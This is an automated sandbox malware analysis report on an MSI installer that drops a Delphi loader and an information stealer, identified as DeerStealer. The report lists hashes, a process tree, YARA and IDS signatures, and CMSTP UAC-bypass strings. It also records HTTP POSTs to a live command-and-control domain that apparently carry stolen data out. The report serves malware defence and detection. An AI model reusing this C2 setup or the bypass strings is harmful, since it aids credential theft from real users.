Windows Analysis Report
ONHQNHFT.msi

Overview

General Information

Sample name: ONHQNHFT.msi
Analysis ID: 1565498
MD5: 829e5e01899cac6e4326893afbf5be82
SHA1: da638840f3452d74b9118d6c60a5a6cf70b87901
SHA256: 84abc28b1da1c2ddf01072fb2817eb446933ba98ecc0db2228281d6fcfadff0c
Tags: msi, user-aachum
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • msiexec.exe (PID: 7552 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ONHQNHFT.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7588 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • IDRBackup.exe (PID: 7680 cmdline: "C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe" MD5: 371C165E3E3C1A000051B78D7B0E7E79)
      • IDRBackup.exe (PID: 7776 cmdline: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe MD5: 371C165E3E3C1A000051B78D7B0E7E79)
        • cmd.exe (PID: 8044 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • comvalidate_ljv3.exe (PID: 1900 cmdline: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • IDRBackup.exe (PID: 5672 cmdline: "C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe" MD5: 371C165E3E3C1A000051B78D7B0E7E79)
    • cmd.exe (PID: 7692 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • IDRBackup.exe (PID: 5828 cmdline: "C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe" MD5: 371C165E3E3C1A000051B78D7B0E7E79)
    • cmd.exe (PID: 7888 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • comvalidate_ljv3.exe (PID: 7972 cmdline: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\toolsync_RO\rtl120.bpl | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\AppData\Local\Temp\Aplanogamete\rtl120.bpl | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
Source | Rule | Description | Author | Strings
0000000C.00000002.2541651390.00000000030F0000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000002.00000002.1802356275.0000000003836000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
Source | Rule | Description | Author | Strings
12.2.cmd.exe.30f07f8.1.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
12.2.cmd.exe.30f07f8.1.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
  • 0x10f60:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x10f28:$s2: Elevation:Administrator!new:
2.2.IDRBackup.exe.50000000.7.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
10.2.comvalidate_ljv3.exe.26d86ed.2.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
10.2.comvalidate_ljv3.exe.26d86ed.2.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
  • 0x25e675:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x25e700:$s1: CoGetObject
  • 0x25e659:$s2: Elevation:Administrator!new:
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-30T02:25:12.480061+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49766 | 172.67.141.133 | 443 | TCP
2024-11-30T02:25:14.994029+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49772 | 172.67.141.133 | 443 | TCP
2024-11-30T02:25:17.012217+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49777 | 172.67.141.133 | 443 | TCP
2024-11-30T02:25:20.232067+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49782 | 172.67.141.133 | 443 | TCP
2024-11-30T02:25:22.751443+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49787 | 172.67.141.133 | 443 | TCP
2024-11-30T02:25:24.669971+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49792 | 172.67.141.133 | 443 | TCP
2024-11-30T02:25:26.739226+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49797 | 172.67.141.133 | 443 | TCP
2024-11-30T02:25:28.673993+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49803 | 172.67.141.133 | 443 | TCP
2024-11-30T02:25:31.106397+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49809 | 172.67.141.133 | 443 | TCP
2024-11-30T02:25:33.734459+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49815 | 172.67.141.133 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-30T02:25:13.319327+0100 | 2056550 | 1 | A Network Trojan was detected | 192.168.2.4 | 49766 | 172.67.141.133 | 443 | TCP

                      AV Detection

                      Source: ONHQNHFT.msi, ReversingLabs: Detection: 13%
                      Source: ONHQNHFT.msi, Virustotal: Detection: 12%
                      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Local\Temp\ikltbdky, Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\wqosufsc, Joe Sandbox ML: detected

                      Exploits

                      Source: Yara match, File source: Process Memory Space: cmd.exe PID: 8044, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: comvalidate_ljv3.exe PID: 1900, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: cmd.exe PID: 7692, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: cmd.exe PID: 7888, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: comvalidate_ljv3.exe PID: 7972, type: MEMORYSTR
                      Source: unknown, HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49766 version: TLS 1.2
                      Source: unknown, HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49772 version: TLS 1.2
                      Source: unknown, HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49777 version: TLS 1.2
                      Source: unknown, HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49782 version: TLS 1.2
                      Source: unknown, HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49787 version: TLS 1.2
                      Source: unknown, HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49792 version: TLS 1.2
                      Source: unknown, HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49797 version: TLS 1.2
                      Source: unknown, HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49803 version: TLS 1.2
                      Source: unknown, HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49809 version: TLS 1.2
                      Source: unknown, HTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49815 version: TLS 1.2
                      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: comvalidate_ljv3.exe, 0000000A.00000002.2619174284.00000000007F3000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: comvalidate_ljv3.exe
                      Source: Binary string: wntdll.pdbUGP source: IDRBackup.exe, 00000002.00000002.1806069392.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1804905047.0000000003B12000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2286422984.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285768066.000000000460E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2542312095.0000000005580000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541724901.0000000004CB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897539758.0000000005120000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897095781.000000000485A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: comvalidate_ljv3.exe
                      Source: Binary string: wntdll.pdb source: IDRBackup.exe, 00000002.00000002.1806069392.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1804905047.0000000003B12000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2286422984.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285768066.000000000460E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2542312095.0000000005580000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541724901.0000000004CB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897539758.0000000005120000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897095781.000000000485A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatory source: comvalidate_ljv3.exe, 0000000A.00000002.2619174284.00000000007F3000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatiner source: comvalidate_ljv3.exe, 0000000A.00000002.2619174284.00000000007F3000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\System32\msiexec.exe, File opened: z:
                      Source: C:\Windows\System32\msiexec.exe, File opened: x:
                      Source: C:\Windows\System32\msiexec.exe, File opened: v:
                      Source: C:\Windows\System32\msiexec.exe, File opened: t:
                      Source: C:\Windows\System32\msiexec.exe, File opened: r:
                      Source: C:\Windows\System32\msiexec.exe, File opened: p:
                      Source: C:\Windows\System32\msiexec.exe, File opened: n:
                      Source: C:\Windows\System32\msiexec.exe, File opened: l:
                      Source: C:\Windows\System32\msiexec.exe, File opened: j:
                      Source: C:\Windows\System32\msiexec.exe, File opened: h:
                      Source: C:\Windows\System32\msiexec.exe, File opened: f:
                      Source: C:\Windows\System32\msiexec.exe, File opened: b:
                      Source: C:\Windows\System32\msiexec.exe, File opened: y:
                      Source: C:\Windows\System32\msiexec.exe, File opened: w:
                      Source: C:\Windows\System32\msiexec.exe, File opened: u:
                      Source: C:\Windows\System32\msiexec.exe, File opened: s:
                      Source: C:\Windows\System32\msiexec.exe, File opened: q:
                      Source: C:\Windows\System32\msiexec.exe, File opened: o:
                      Source: C:\Windows\System32\msiexec.exe, File opened: m:
                      Source: C:\Windows\System32\msiexec.exe, File opened: k:
                      Source: C:\Windows\System32\msiexec.exe, File opened: i:
                      Source: C:\Windows\System32\msiexec.exe, File opened: g:
                      Source: C:\Windows\System32\msiexec.exe, File opened: e:
                      Source: C:\Windows\SysWOW64\cmd.exe, File opened: c:
                      Source: C:\Windows\System32\msiexec.exe, File opened: a:
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Code function: 2_2_5001C0CC @Sysutils@FindFirst$qqrx20System@UnicodeStringir19Sysutils@TSearchRec,@System@@UStrToPWChar$qqrx20System@UnicodeString,FindFirstFileW,@Sysutils@FindClose$qqrr19Sysutils@TSearchRec,GetLastError,2_2_5001C0CC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Code function: 2_2_5000C390 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,2_2_5000C390
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Code function: 2_2_5001BB34 FindFirstFileW,FindClose,@System@Move$qqrpxvpvi,2_2_5001BB34
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Code function: 2_2_5001BD10 @System@@UStrToPWChar$qqrx20System@UnicodeString,FindFirstFileW,FindClose,2_2_5001BD10
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Code function: 10_2_000000014000A5E0 GetDlgItem,SendMessageW,SendMessageW,SendMessageW,wsprintfW,GetClientRect,SendMessageW,FindFirstFileW,lstrlenW,SendMessageW,FindNextFileW,FindClose,10_2_000000014000A5E0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Code function: 10_2_0000000140007628 FindClose,lstrlenW,lstrcpyW,FindFirstFileW,GetFullPathNameW,FindClose,SetLastError,lstrlenW,10_2_0000000140007628
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Code function: 10_2_000000014000D848 GetLogicalDriveStringsW,GetDlgItem,GetDriveTypeW,_cwprintf_s_l,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SHGetSpecialFolderPathW,lstrlenW,SHGetSpecialFolderPathW,lstrlenW,SendMessageW,SendMessageW,GetDlgItem,SendMessageW,SendMessageW,GetDlgItem,SendMessageW,RegOpenKeyExW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,SendMessageW,SendMessageW,SendMessageW,RegCloseKey,10_2_000000014000D848
                      Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
                      Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
                      Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Roaming\
                      Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\
                      Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

                      Networking

                      Source: Network traffic, Suricata IDS: 2056550 - Severity 1 - ET MALWARE Win32/DeerStealer CnC Checkin : 192.168.2.4:49766 -> 172.67.141.133:443
                      Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49766 -> 172.67.141.133:443
                      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49777 -> 172.67.141.133:443
                      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49782 -> 172.67.141.133:443
                      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49792 -> 172.67.141.133:443
                      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49772 -> 172.67.141.133:443
                      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49803 -> 172.67.141.133:443
                      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49815 -> 172.67.141.133:443
                      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49787 -> 172.67.141.133:443
                      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49797 -> 172.67.141.133:443
                      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49809 -> 172.67.141.133:443
                      Source: global traffic, HTTP traffic detected:
                        POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                        Content-Length: 96
                        Host: gakaroli.online
                      Source: global traffic, HTTP traffic detected:
                        POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                        action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                        Content-Length: 53
                        Host: gakaroli.online
                      Source: global traffic, HTTP traffic detected:
                        POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                        action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                        Content-Length: 208
                        Host: gakaroli.online
                      Source: global traffic, HTTP traffic detected:
                        POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                        action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                        Content-Length: 103358
                        Host: gakaroli.online
                      Source: global traffic, HTTP traffic detected:
                        POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                        action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                        Content-Length: 745
                        Host: gakaroli.online
                      Source: global traffic, HTTP traffic detected:
                        POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                        action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                        Content-Length: 212
                        Host: gakaroli.online
                      Source: global traffic, HTTP traffic detected:
                        POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                        action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                        Content-Length: 380
                        Host: gakaroli.online
                      Source: global traffic, HTTP traffic detected:
                        POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                        action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                        Content-Length: 29465
                        Host: gakaroli.online
                      Source: global traffic, HTTP traffic detected:
                        POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                        action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                        Content-Length: 104764
                        Host: gakaroli.online
                      Source: global traffic, HTTP traffic detected:
                        POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                        action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                        Content-Length: 35
                        Host: gakaroli.online
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: gakaroli.online
                      Source: unknownHTTP traffic detected: POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15Content-Length: 96Host: gakaroli.online
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
